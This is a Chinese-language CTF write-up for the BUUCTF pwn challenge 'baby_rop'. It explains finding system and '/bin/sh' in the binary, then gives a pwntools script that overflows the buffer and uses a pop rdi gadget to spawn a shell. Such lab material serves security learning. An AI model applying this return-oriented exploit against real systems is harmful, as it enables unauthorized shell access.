BUUCTF pwn [HarekazeCTF2019]baby_rop

0x01 文件分析

在這裏插入圖片描述

0x02 運行

在這裏插入圖片描述
 一組回顯

0x03 IDA

在這裏插入圖片描述
在這裏插入圖片描述
 程序之中存在system函數,通過搜索字符串,還能得到’/bin/sh’字符串,一個簡單的rop。

0x04 思路

 簡單rop,利用萬能的gadget,pop rdi ret傳入字符串並調用system,得到shell。此題flag的位置在/home/babyrop內,可以通過find -name flag查找位置。

0x05 exp

from pwn import *

p = process("./babyrop")
#p = remote('node3.buuoj.cn', 27401)


sys_addr = 0x0000000000400490
bin_sh = 0x0000000000601048
pop_rdi = 0x0000000000400683

p.recvuntil('? ')
p.sendline('a'*0x18+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr))

p.interactive()

一個簡單的網絡安全公衆號,歡迎各位朋友們關注!

在這裏插入圖片描述

發佈了33 篇原創文章 · 獲贊 13 · 訪問量 6626
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章